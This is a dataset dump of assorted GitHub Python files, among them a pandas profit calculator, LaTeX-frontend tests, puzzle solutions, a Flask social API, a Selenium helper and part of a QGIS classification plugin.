bare method reference was always truthy\n            usr_key = ndb.Key(AccountSettings, user_id)\n            usr = usr_key.get()\n            return usr\n        else:\n            logging.error(\"User %s doesn't exist in db\" % user_id)\n","repo_name":"elinesterov/imp-roomba-gae-app","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"24705973010","text":"import pandas as pd\n\n\ndef calculate_tariff(file_name):\n    data_frame = pd.read_json(file_name)\n    data_frame['tariff'] = data_frame['highway_cost'] / data_frame['products'].apply(\n        lambda x: sum(item['quantity'] for item in x))\n\n    unique_warehouses = data_frame[['warehouse_name', 'tariff']].drop_duplicates()\n\n    return data_frame\n\n\ndef field_sum_calculation(data):\n    data_frame = data\n\n    # Explode the 'products' column and compute the summary values\n    aggregated_data = data_frame['products'].explode().apply(pd.Series)\n    aggregated_data['income'] = 
aggregated_data['quantity'] * aggregated_data['price']\n    aggregated_data['expenses'] = aggregated_data['quantity'] * data_frame['tariff']\n    aggregated_data['profit'] = aggregated_data['income'] - aggregated_data['expenses']\n    # Group by product and sum\n    grouped_data = aggregated_data.groupby('product').sum().reset_index()\n    # Rename the columns\n    table = grouped_data[['product', 'quantity', 'income', 'expenses', 'profit']]\n\n    return table\n\n\ndef profit_calculation(data):\n    data_frame = data\n\n    # Calculate the profit for each order\n    data_frame['order_profit'] = data_frame['products'].apply(\n        lambda x: sum(item['quantity'] * item['price'] for item in x)) + data_frame['tariff'] * data_frame[\n        'products'].apply(lambda x: sum(item['quantity'] for item in x))\n\n    # Build a table with the required columns 'order_id' and 'order_profit'\n    table = data_frame[['order_id', 'order_profit']]\n    return table\n\n\nif __name__ == '__main__':\n    file_path = 'trail_task.json'\n    data_frame = calculate_tariff(file_path)\n    unique_warehouses = data_frame[['warehouse_name', 'tariff']].drop_duplicates()\n    print(unique_warehouses)\n    print(field_sum_calculation(data_frame))\n    print(profit_calculation(data_frame))\n    data_frame = profit_calculation(data_frame)\n    average_profit = data_frame['order_profit'].mean()\n    print(\"Average order profit:\", average_profit)\n","repo_name":"HosaruLDV/trail_task","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"23766945117","text":"\"\"\"Tests for BasicFrontend.\"\"\"\n# pylint: disable=invalid-name\n\nimport io\nfrom typing import List\n\nfrom quietex.frontend import BasicFrontend\n\n\nclass StringBasicFrontend(BasicFrontend):\n    \"\"\"BasicIO which records its outputs in a StringIO.\"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        self._output = io.StringIO()\n\n    def _write(self, raw_value):\n        return self._output.write(raw_value)\n\n    def _input(self, raw_prompt):\n        self._write(raw_prompt + \"\\n\")\n        return \"\"\n\n    @property\n    def output(self):\n        \"\"\"Everything printed so far, as a string.\"\"\"\n        return self._output.getvalue()\n\n    def assert_display_like(self, lines):\n        r\"\"\"Make an assertion about what's on the display.\n\n        If `lines` is a string, assert that the output so far is equal to it. 
If\n `lines` is a list of strings, assert that the output so far is equal to those\n strings joined with \\n.\n\n Roughly compatible with test_TerminalFrontend.FakeTerminalFrontend.\n \"\"\"\n if isinstance(lines, str):\n lines = [lines]\n assert self.output == \"\\n\".join(lines)\n\n\ndef test_simple():\n \"\"\"Print some plain text and check that the status bar is not printed.\"\"\"\n frontend = StringBasicFrontend()\n frontend.print(\"Test\")\n assert frontend.output == \"Test\\n\"\n\n\ndef test_state():\n \"\"\"Check that printing StartPage and OpenFile triggers the status bar.\"\"\"\n frontend = StringBasicFrontend()\n frontend.print(\"(./test.tex [1]\")\n assert frontend.output == \"(./test.tex [1]\\n[1] (./test.tex)\\n\"\n\n\ndef test_log_newline():\n \"\"\"Test that printing a log message puts newlines in the right places.\"\"\"\n frontend = StringBasicFrontend()\n frontend.print(\"test [1]\")\n frontend.log(\"log\")\n assert frontend.output == \"test [1]\\n[1]\\nlog\\n\"\n frontend.log(\"log2\")\n assert frontend.output == \"test [1]\\n[1]\\nlog\\nlog2\\n\"\n\n\nEXAMPLE_OUTPUT = [\n \"(./open.tex \",\n \"error [1]\",\n \"test\",\n \"\",\n \"{./aux.map}\",\n \"<./image.png>\",\n \"warning [2]\",\n \")\",\n]\nEXAMPLE_VERBOSE = [\n \"(./open.tex \",\n \"(./open.tex)\",\n \"error [1]\",\n \"[1] (./open.tex)\",\n \"test\",\n \"\",\n \"{./aux.map}\",\n \"<./image.png>\",\n \"warning [2]\",\n \"[2] (./open.tex)\",\n \")\",\n \"[2]\",\n \"Log message\",\n \"? \",\n \"\",\n]\nEXAMPLE_QUIET = [\n \" \",\n \"(./open.tex)\",\n \"error [1]\",\n \"[1] (./open.tex)\",\n \"test\",\n \"\",\n \"warning [2]\",\n \"[2] (./open.tex)\",\n \"[2]\",\n \"? \",\n \"\",\n]\n\n\ndef _frontend_integration_test(frontend, output: List[str], expected: List[str]):\n for line in output:\n frontend.print(line)\n frontend.log(\"Log message\")\n frontend.input(\"? \")\n frontend.assert_display_like(expected)\n\n\ndef test_verbose():\n \"\"\"Test printing each type of token in verbose mode.\"\"\"\n _frontend_integration_test(StringBasicFrontend(), EXAMPLE_OUTPUT, EXAMPLE_VERBOSE)\n\n\ndef test_quiet():\n \"\"\"Test printing each type of token in quiet mode.\"\"\"\n frontend = StringBasicFrontend(quiet=True)\n _frontend_integration_test(frontend, EXAMPLE_OUTPUT, EXAMPLE_QUIET)\n\n\ndef test_error_bell():\n \"\"\"Test that printing an error adds a bell character.\"\"\"\n frontend = StringBasicFrontend(bell_on_error=True)\n frontend.print(\"! 
Generic error\")\n    assert \"\\a\" in frontend.output\n\n\ndef test_print_partial():\n    \"\"\"Test that trying to print a partial line does nothing.\"\"\"\n    frontend = StringBasicFrontend()\n    frontend.print(\"test\", finished=False)\n    assert frontend.output == \"\"\n","repo_name":"mje-nz/quietex","sub_path":"test/test_BasicFrontend.py","file_name":"test_BasicFrontend.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"}
{"seq_id":"40404406823","text":"#\n# @lc app=leetcode id=345 lang=python3\n#\n# [345] Reverse Vowels of a String\n#\n\n# @lc code=start\nclass Solution:\n    def reverseVowels(self, s: str) -> str:\n        vowels = set('aeiouAEIOU')\n        # Collect the vowels in order; popping them off the stack yields them reversed.\n        stack = [c for c in s if c in vowels]\n        # Strings are immutable, so rebuild the result from a list of characters.\n        chars = list(s)\n        for i, c in enumerate(chars):\n            if c in vowels:\n                chars[i] = stack.pop()\n        return ''.join(chars)\n# @lc code=end\n\n","repo_name":"E-dmp/LeetCode","sub_path":"345.reverse-vowels-of-a-string.py","file_name":"345.reverse-vowels-of-a-string.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"33527715032","text":"#!/bin/env python3\n\nimport time\nfrom selenium import webdriver\nfrom selenium.common.exceptions import *\nfrom selenium.webdriver.remote.webelement import WebElement\n\nclass Query:\n\tclass All(str):\n\t\tpass\n\tclass Script(str):\n\t\t@staticmethod\n\t\tdef format(s):\n\t\t\treturn '''\n\t\t\t\tfunction $r(...r) { return Array.from(...r) }\n\t\t\t\tfunction $q(...r) { return document.querySelector(...r) }\n\t\t\t\tfunction $qq(...r) { return document.querySelectorAll(...r) }\n\t\t\t\tfunction $qqr(...r) { return $r($qq(...r)) }\n\t\t\t''' + s\n\t\tpass\n\nclass TimeoutException(Exception):\n\tpass\n\nclass Wait:\n\t@staticmethod\n\tdef sleep(secs):\n\t\ttime.sleep(secs)\n\t@staticmethod\n\tdef until(check,interval=.25,timeout=10):\n\t\tstart = time.time()\n\t\tfor i in range(int(float(timeout) / interval)+1):\n\t\t\tif time.time()-start > timeout:\n\t\t\t\tbreak\n\t\t\tv = check()\n\t\t\tif not (v is None):\n\t\t\t\treturn v\n\t\t\ttime.sleep(interval)\n\t\traise TimeoutException( \\\n\t\t\t'Wait.until timeout: %i, %i' % (interval,timeout))\n\nclass Act:\n\t@staticmethod\n\tdef click(z,n):\n\t\tprint('clicking',n)\n\t\tz.execute_script('arguments[0].click()',n)\n\t\treturn n\n\t@staticmethod\n\tdef focus(z,n):\n\t\tz.execute_script('arguments[0].focus()',n)\n\t\treturn n\n\t@staticmethod\n\tdef value(z,n):\n\t\treturn z.execute_script('arguments[0].value',n)\n\t@staticmethod\n\tdef repeat(f,interval=.1,count=10):\n\t\terr = None\n\t\tfor i in range(count):\n\t\t\ttry:\n\t\t\t\treturn f()\n\t\t\texcept Exception as e:\n\t\t\t\terr = e\n\t\t\ttime.sleep(interval)\n\t\traise err\n\nclass qtable:\n\t_driver = None\n\t_table = {}\n\t\n\tdef __init__(self,driver,table={},**kw):\n\t\tself._driver = driver\n\t\tself.add(table,**kw)\n\t\n\tdef __getitem__(self,k):\n\t\treturn getattr(self,k)\n\t\n\tdef __setitem__(self,k,v):\n\t\treturn setattr(self,k,v)\n\t\n\tdef __getattr__(self,k):\n\t\tif not (k in self._table):\n\t\t\traise AttributeError('(%s) not found in table:\\n%s' % (\n\t\t\t\tk,\n\t\t\t\t'\\n'.join(self._table.keys())\n\t\t\t))\n\t\tq = self._table[k]\n\t\tif k == 'query':\n\t\t\treturn q\n\t\tif isinstance(q,Query.All):\n\t\t\ttry:\n\t\t\t\treturn self._driver.find_elements_by_css_selector(q)\n\t\t\texcept NoSuchElementException:\n\t\t\t\treturn None\n\t\telif isinstance(q,Query.Script):\n\t\t\tscript = Query.Script.format(q)\n\t\t\treturn 
self._driver.execute_script(script)\n\t\telse:\n\t\t\ttry:\n\t\t\t\treturn self._driver.find_element_by_css_selector(q)\n\t\t\texcept NoSuchElementException:\n\t\t\t\treturn None\n\t\n\tdef __setattr__(self,k,v):\n\t\t#print('setattr',k,v)\n\t\tif not self._ownattr(k):\n\t\t\treturn super().__setattr__(k,v)\n\t\tn = self[k]\n\t\tif isinstance(n,WebElement):\n\t\t\tself._driver.execute_script('arguments[0].value = arguments[1]',n,v)\n\t\telse:\n\t\t\traise AttributeError()\n\t\n\tdef _ownattr(self,k):\n\t\treturn (k in self._table) or k == 'query'\n\t\n\tdef add(self,table={},**kw):\n\t\tfor k,v in table.items():\n\t\t\tself._table[k] = v\n\t\tfor k,v in kw.items():\n\t\t\tself._table[k] = v\n\n\n","repo_name":"codewillclick/qtable","sub_path":"qtable.py","file_name":"qtable.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29619583662","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom flask import Flask, request\nfrom orator.orm import belongs_to, has_many, belongs_to_many\nfrom flask_orator import Orator, jsonify\n\n# Configuration\nDEBUG = True\nORATOR_DATABASES = {\n 'default': 'twittor',\n 'twittor': {\n 'driver': 'sqlite',\n 'database': os.path.join(os.path.dirname(__file__), 'twittor.db'),\n 'log_queries': True\n }\n}\nSECRET_KEY = '4K5UA6+BMeyNPgYxhjFU03dYA1NlDGrf3wRr8uOcIHU='\n\n# Creating Flask application\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n# Initializing Orator\ndb = Orator(app)\n\n# Models\n\nclass User(db.Model):\n\n __fillable__ = ['name', 'email']\n\n __hidden__ = ['pivot']\n\n @has_many\n def messages(self):\n return Message\n\n @belongs_to_many(\n 'followers',\n 'followed_id', 'follower_id',\n with_timestamps=True\n )\n def followers(self):\n return User\n\n @belongs_to_many(\n 'followers',\n 'follower_id', 'followed_id',\n with_timestamps=True\n )\n def followed(self):\n return User\n\n def is_following(self, user):\n return self.followed().where('followed_id', user.id).exists()\n\n def is_followed_by(self, user):\n return self.followers().where('follower_id', user.id).exists()\n\n def follow(self, user):\n if not self.is_following(user):\n self.followed().attach(user)\n\n def unfollow(self, user):\n if self.is_following(user):\n self.followed().detach(user)\n\n\nclass Message(db.Model):\n\n __fillable__ = ['content']\n\n @belongs_to\n def user(self):\n return User\n\n\n# Routes\n\n# Users\n\n@app.route('/users', methods=['POST'])\ndef create_user():\n user = User.create(**request.get_json())\n\n return jsonify(user)\n\n\n@app.route('/users/', methods=['GET'])\ndef get_user(user_id):\n user = User.find_or_fail(user_id)\n\n return jsonify(user)\n\n\n@app.route('/users', methods=['GET'])\ndef get_all_users():\n users = User.all()\n\n return jsonify(users)\n\n\n@app.route('/users/', methods=['PATCH'])\ndef update_user(user_id):\n user = User.find_or_fail(user_id)\n user.update(**request.get_json())\n\n return jsonify(user)\n\n\n@app.route('/users//messages', methods=['GET'])\ndef get_user_messages(user_id):\n user = User.find_or_fail(user_id)\n\n return jsonify(user.messages)\n\n\n@app.route('/users//messages', methods=['POST'])\ndef create_message(user_id):\n user = User.find_or_fail(user_id)\n\n return jsonify(user.messages().create(**request.get_json()))\n\n\n@app.route('/users//following', methods=['GET'])\ndef get_user_following(user_id):\n user = User.find_or_fail(user_id)\n\n return 
jsonify(user.followed)\n\n\n@app.route('/users//followers', methods=['GET'])\ndef get_user_followers(user_id):\n user = User.find_or_fail(user_id)\n\n return jsonify(user.followers)\n\n\n@app.route('/users//following/', methods=['PUT'])\ndef follow_user(user_id, followed_id):\n user = User.find_or_fail(user_id)\n followed = User.find_or_fail(followed_id)\n\n user.follow(followed)\n\n return app.response_class('No Content', 204)\n\n@app.route('/users//following/', methods=['DELETE'])\ndef unfollow_user(user_id, followed_id):\n user = User.find_or_fail(user_id)\n followed = User.find_or_fail(followed_id)\n\n user.unfollow(followed)\n\n return app.response_class('No Content', 204)\n\n\n@app.route('/messages/', methods=['GET'])\ndef get_message(message_id):\n message = Message.find_or_fail(message_id)\n\n return jsonify(message)\n\n\n@app.route('/messages/', methods=['PATCH'])\ndef update_message(message_id):\n message = Message.find_or_fail(message_id)\n message.update(**request.get_json())\n\n return jsonify(message)\n\n@app.route('/messages/', methods=['DELETE'])\ndef delete_message(message_id):\n message = Message.find_or_fail(message_id)\n message.delete()\n\n return app.response_class('No Content', 204)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"sdispater/twittor-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"63"} +{"seq_id":"35376070600","text":"import requests\nimport settings\n\ndef verify(token):\n data = {\n 'response': token,\n 'secret': settings.HCAPTCHA_SECRET_KEY\n }\n response = requests.post('https://hcaptcha.com/siteverify', data=data)\n if response.json().get('success'):\n return True\n return False","repo_name":"baealex/notility","sub_path":"server/app/module/hcaptcha.py","file_name":"hcaptcha.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"4294064871","text":"from typing import List\n\nclass Solution:\n def allPathsSourceTarget(self, graph: List[List[int]]) -> List[List[int]]:\n\n # Initializing the result list to store all paths\n result = []\n\n # Helper function to perform Depth First Search (DFS) on the graph\n def dfs(path: List[int]) -> None:\n # When the last node in the path is the target node, add the path to the result list\n if path[-1] == len(graph) - 1:\n result.append(path)\n return\n\n # If not the target node, explore the adjacent nodes recursively using DFS\n for neighbor in graph[path[-1]]:\n dfs(path + [neighbor])\n\n # Start DFS from the source node (0)\n dfs([0])\n\n return result\n\n\n# Test the solution using if __name__ == '__main__' clause\nif __name__ == '__main__':\n sol = Solution()\n\n graph1 = [[1, 2], [3], [3], []]\n assert sol.allPathsSourceTarget(graph1) == [[0, 1, 3], [0, 2, 3]]\n\n graph2 = [[4, 3, 1], [3, 2, 4], [3], [4], []]\n assert sol.allPathsSourceTarget(graph2) == [[0, 4], [0, 3, 4], [0, 1, 3, 4], [0, 1, 2, 3, 4], [0, 1, 4]]\n\n graph3 = [[1], []]\n assert sol.allPathsSourceTarget(graph3) == [[0, 1]]\n\n print(\"All tests passed.\")\n","repo_name":"aurimas13/Solutions-To-Problems","sub_path":"LeetCode/Python Solutions/All Paths From Source to Target/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"63"} +{"seq_id":"35330434745","text":"import numpy as np\r\nimport 
math\r\n# target area: x=124..174, y=-123..-86\r\ntarget_x = [124, 174]\r\ntarget_y = [-123, -86]\r\n\r\n# target_x = [20, 30]\r\n# target_y = [-10, -5]\r\n\r\ndef get_pos(step, v_init):\r\n return math.floor(step * v_init - (step * (step - 1)) / 2)\r\n\r\ndef get_step_of_furthest_pos(v_init):\r\n return max(v_init + 0.5,0)\r\n\r\ndef is_in_y(y):\r\n return ((y >= target_y[0]) and (y <= target_y[1]))\r\n\r\ndef is_in_x(x):\r\n return ((x >= target_x[0]) and (x <= target_x[1]))\r\n\r\ndef is_in(x, y):\r\n return (is_in_x(x) and is_in_y(y))\r\n\r\ndef part1():\r\n cur_best = 0\r\n for vy in range(-200, 200):\r\n for vx in range(1, 200):\r\n step_y_max = get_step_of_furthest_pos(vy)\r\n y_max = get_pos(step_y_max, vy)\r\n step_x_end = get_step_of_furthest_pos(vx)\r\n x_max = get_pos(step_x_end, vx)\r\n for step in range(math.floor(step_y_max), math.ceil(step_x_end)+500): #math.ceil(step_x_end)):\r\n x_ = max(get_pos(step,vx), x_max)\r\n y_ = get_pos(step,vy)\r\n if is_in(x_, y_):\r\n if y_max > cur_best:\r\n print(\"{},{} -> {}\".format(vx, vy, y_max))\r\n cur_best = y_max\r\n elif x_ > target_x[1]:\r\n break\r\n elif y_ < target_y[0]:\r\n break\r\n\r\ndef part2():\r\n counter_distinct = 0\r\n for vy in range(-600, 600):\r\n for vx in range(1, 550):\r\n flag=False\r\n has_reached_max = False\r\n step_x_end = get_step_of_furthest_pos(vx)\r\n x_max = get_pos(step_x_end, vx)\r\n if x_max >= target_x[0]:\r\n for step in range(0, math.ceil(step_x_end)+1000): #math.ceil(step_x_end)):\r\n x_ = get_pos(step,vx)\r\n if x_ >= x_max:\r\n has_reached_max = True\r\n if has_reached_max:\r\n x_ = x_max\r\n if x_ < 0:\r\n x_ = x_max\r\n\r\n y_ = get_pos(step,vy)\r\n if is_in(x_, y_):\r\n flag = True\r\n elif x_ > target_x[1]:\r\n break\r\n elif y_ < target_y[0]:\r\n break\r\n if flag:\r\n print(\"{},{}\".format(vx, vy))\r\n counter_distinct += 1\r\n return counter_distinct\r\n\r\n","repo_name":"gherbin/aoc2021","sub_path":"aoc_2021/source/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24266991985","text":"from rest_framework import serializers\n\n\nclass PageSerializer(serializers.Serializer):\n before = serializers.SerializerMethodField()\n after = serializers.SerializerMethodField()\n\n def get_before(self, obj):\n if obj.has_previous():\n return f\"{self.context['request'].path}?page={obj.previous_page_number()}\"\n\n return None\n\n def get_after(self, obj):\n if obj.has_next():\n return f\"{self.context['request'].path}?page={obj.next_page_number()}\"\n\n return None\n\n class Meta:\n fields = ('before', 'after')\n","repo_name":"YujinHa/seouling-server","sub_path":"seouling/utils/page_serializer.py","file_name":"page_serializer.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41067785103","text":"with open(\"input.txt\") as file:\n lines = [line[:-2] for line in file.readlines()]\n\n\nbag_children_lookup = {}\n\n\nfor line in lines:\n split = line.split(\" bags contain \")\n\n bag_colour = split[0]\n bag_children_lookup[bag_colour] = []\n\n children_bags = []\\\n if split[1] == 'no other bags'\\\n else split[1][:-1].split(\", \")\n\n for child_bag in children_bags:\n bag_colour_parts = child_bag.split()\n count = int(bag_colour_parts[0])\n colour = f\"{bag_colour_parts[1]} {bag_colour_parts[2]}\"\n bag_children_lookup[bag_colour].append([count, 
colour])\n\n\ndef can_contain_gold_bag(colour):\n can_contain_gold = False\n\n for child_bag in bag_children_lookup[colour]:\n child_bag_colour = child_bag[1]\n if child_bag_colour == \"shiny gold\" or can_contain_gold_bag(child_bag_colour):\n can_contain_gold = True\n\n return can_contain_gold\n\n\ntotal = 0\nfor colour in bag_children_lookup.keys():\n if can_contain_gold_bag(colour):\n total += 1\n\nprint(f\"Bags that can contain a gold bag: {total}\")\n\n\ndef number_of_bags_inside(colour):\n total = 0\n\n for child_bag in bag_children_lookup[colour]:\n number_of_child_bags = child_bag[0]\n total += number_of_child_bags + (number_of_child_bags * number_of_bags_inside(child_bag[1]))\n\n return total\n\n\nprint(f\"Number of bags inside a gold bag: {number_of_bags_inside('shiny gold')}\")\n","repo_name":"Drummerboy444/Advent-of-Code","sub_path":"2020/7-handy-haversacks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"72843340999","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import QIcon, QColor, QRegExpValidator\nfrom PyQt5.QtWidgets import QAction, QLineEdit, QDesktopWidget, QMessageBox, QDockWidget\nfrom qgis.core import *\n# Initialize Qt resources from file resources.py\nfrom .resources import *\n# Import the code for the dialog\nfrom .aChor_dialog import aChorDialog\nimport os.path\nimport os, sys, subprocess, shlex, shutil\nfrom subprocess import Popen, PIPE\nfrom osgeo import ogr, osr\nimport qgis.utils\nimport fiona, logging, csv, time\nfrom fiona.crs import from_epsg\nfrom pyproj import Proj, transform\nfrom shapely.geometry import shape, mapping\nimport pysal, math\nfrom pysal.esda.getisord import *\nfrom pysal.weights.Distance import DistanceBand\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nfrom sklearn import metrics\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.preprocessing import StandardScaler\nimport dbf, webbrowser\n\nclass aChor:\n \"\"\"QGIS Plugin Implementation.\"\"\"\n \n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n \"\"\"\n # Save reference to the QGIS interface\n self.iface = iface\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n # initialize locale\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'aChor_{}.qm'.format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n\n # Create the dialog (after translation) and keep reference\n self.dlg = aChorDialog()\n\n # Declare instance attributes\n self.actions = []\n self.menu = self.tr(u'&Task-oriented data classification for polygons')\n # TODO: We are going to let the user set this up in a future iteration\n self.toolbar = self.iface.addToolBar(u'aChor')\n self.toolbar.setObjectName(u'aChor')\n self.load_comboBox()\n \n # noinspection PyMethodMayBeStatic\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated 
version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('aChor', message)\n\n def pr(self, msg):\n QMessageBox.information(self.iface.mainWindow(),\"Debug\",msg)\n \n def add_action(\n self,\n icon_path,\n text,\n callback,\n enabled_flag=True,\n add_to_menu=True,\n add_to_toolbar=True,\n status_tip=None,\n whats_this=None,\n parent=None):\n \"\"\"Add a toolbar icon to the toolbar.\n\n :param icon_path: Path to the icon for this action. Can be a resource\n path (e.g. ':/plugins/foo/bar.png') or a normal file system path.\n :type icon_path: str\n\n :param text: Text that should be shown in menu items for this action.\n :type text: str\n\n :param callback: Function to be called when the action is triggered.\n :type callback: function\n\n :param enabled_flag: A flag indicating if the action should be enabled\n by default. Defaults to True.\n :type enabled_flag: bool\n\n :param add_to_menu: Flag indicating whether the action should also\n be added to the menu. Defaults to True.\n :type add_to_menu: bool\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n :param status_tip: Optional text to show in a popup when mouse pointer\n hovers over the action.\n :type status_tip: str\n\n :param parent: Parent widget for the new action. Defaults None.\n :type parent: QWidget\n\n :param whats_this: Optional text to show in the status bar when the\n mouse pointer hovers over the action.\n\n :returns: The action that was created. Note that the action is also\n added to self.actions list.\n :rtype: QAction\n \"\"\"\n\n icon = QIcon(icon_path)\n action = QAction(icon, text, parent)\n action.triggered.connect(callback)\n action.setEnabled(enabled_flag)\n\n if status_tip is not None:\n action.setStatusTip(status_tip)\n\n if whats_this is not None:\n action.setWhatsThis(whats_this)\n\n if add_to_toolbar:\n self.toolbar.addAction(action)\n\n if add_to_menu:\n self.iface.addPluginToVectorMenu(\n self.menu,\n action)\n\n self.actions.append(action)\n\n return action\n\n def initGui(self):\n \"\"\"Create the menu entries and toolbar icons inside the QGIS GUI.\"\"\" \n \n icon_path = ':/plugins/aChor/icon.png'\n self.add_action(\n icon_path,\n text=self.tr(u'Task-oriented data classification for polygons'),\n callback=self.run,\n parent=self.iface.mainWindow())\n self.dlg.rdb1.clicked.connect(self.setDisable)\n self.dlg.rdb2.clicked.connect(self.setDisable)\n self.dlg.rdb3.clicked.connect(self.setDisable)\n self.dlg.rdb4.clicked.connect(self.setDisable)\n self.dlg.rdb5.clicked.connect(self.setDisable)\n self.dlg.rdb6.clicked.connect(self.setDisable)\n self.dlg.rdb7.clicked.connect(self.setunChecked)\n self.dlg.rdb8.clicked.connect(self.setDisable)\n self.dlg.cb1.clicked.connect(self.setChecked)\n self.dlg.cb2.clicked.connect(self.setChecked)\n self.dlg.cb3.clicked.connect(self.setChecked)\n rx3 = QRegExp('^0$|^[1-9]\\d*$|^\\.\\d+$|^0\\.\\d*$|^[1-9]\\d*\\.\\d*$')\n validator3 = QRegExpValidator(rx3)\n self.dlg.linefdb.setValidator(validator3) \n self.dlg.rdb4.clicked.connect(self.setEnable)\n self.dlg.rdb6.clicked.connect(self.setEnable)\n self.dlg.btn_help.clicked.connect(self.open_webbrowser)\n \n def open_webbrowser(self):\n webbrowser.open('http://www.geomatik-hamburg.de/g2lab/content/aChor_README.html') \n \n def setChecked(self):\n self.dlg.rdb7.setChecked(True)\n \n def setunChecked(self):\n self.dlg.cb1.setChecked(True)\n 
self.dlg.rdb1.setChecked(False)\n        self.dlg.rdb2.setChecked(False)\n        self.dlg.rdb3.setChecked(False)\n        self.dlg.rdb4.setChecked(False)\n        self.dlg.rdb5.setChecked(False)\n        self.dlg.rdb6.setChecked(False)\n        self.dlg.rdb8.setChecked(False)\n        self.dlg.cb1.setDisabled(False)\n        self.dlg.cb2.setDisabled(False)\n        self.dlg.cb3.setDisabled(False)\n        self.set_disLabel()\n        \n    def unload(self):\n        \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n        for action in self.actions:\n            self.iface.removePluginVectorMenu(\n                self.menu,  # remove the same menu name that add_action registered\n                action)\n            self.iface.removeToolBarIcon(action)\n        # remove the toolbar\n        del self.toolbar\n    \n    def set_disLabel(self):\n        self.dlg.label_5.setDisabled(True)\n        self.dlg.label_7.setDisabled(True)\n        self.dlg.linefdb.setDisabled(True)\n        self.dlg.label_8.setDisabled(True)\n        self.dlg.lineps.setDisabled(True)\n        self.dlg.label_9.setDisabled(True)\n        self.dlg.cBox2.setDisabled(True)\n        if self.dlg.rdb8.isChecked():\n            self.dlg.label_9.setDisabled(False)\n            self.dlg.cBox2.setDisabled(False)\n        \n    def setEnable(self): \n        if self.dlg.rdb4.isChecked():\n            self.dlg.label_5.setDisabled(False)\n            self.dlg.label_7.setDisabled(False)\n            self.dlg.linefdb.setDisabled(False)\n            self.load_comboBox()\n            self.dlg.linefdb.setText(str(round(thresh,4)))\n            self.dlg.label_8.setDisabled(True)\n            self.dlg.lineps.setDisabled(True)\n        if self.dlg.rdb6.isChecked():\n            self.dlg.label_8.setDisabled(False)\n            self.dlg.lineps.setDisabled(False)\n            self.dlg.lineps.setText('0.5')\n        \n    def setDisable(self):\n        self.dlg.rdb7.setChecked(False)\n        self.dlg.cb1.setDisabled(True)\n        self.dlg.cb2.setDisabled(True)\n        self.dlg.cb3.setDisabled(True) \n        self.set_disLabel() \n\n    def clear_fields(self):\n        \"\"\"Clearing the fields when layers are changed\"\"\"\n        self.dlg.comboBox.clear()\n        self.dlg.cBox2.clear()\n\n    def load_comboBox(self):\n        \"\"\"Load the fields into combobox when layers are changed\"\"\"\n        layer_shp = []\n        layers = [layer for layer in QgsProject.instance().mapLayers().values()]\n        \n        if len(layers) != 0: # checklayers exist in the project\n            for layer in layers:\n                if hasattr(layer, \"dataProvider\"):\n                    myfilepath = layer.dataProvider().dataSourceUri() \n                    (myDirectory, nameFile) = os.path.split(myfilepath)\n                    if (\".shp\" in nameFile):\n                        layer_shp.append(layer)\n        selectedLayerIndex = self.dlg.layerListCombo.currentIndex()\n        if selectedLayerIndex < 0 or selectedLayerIndex > len(layer_shp):\n            return\n        try:\n            selectedLayer = layer_shp[selectedLayerIndex]\n        except:\n            return\n\n        self.clear_fields()\n        \n        strname = []\n        catename = []\n        \n        #only Float or Integer field types will be shown in combobox\n        for field in selectedLayer.fields():\n            ftype = str(field.type()) \n            if ftype == '2' or ftype == '4' or ftype == '6':\n                strname.append(field.name())\n            else:\n                catename.append(field.name())\n        \n        self.dlg.comboBox.addItems(strname)\n        self.dlg.cBox2.addItems(catename)\n        \n        (path, layer_id) = selectedLayer.dataProvider().dataSourceUri().split('|')\n\n        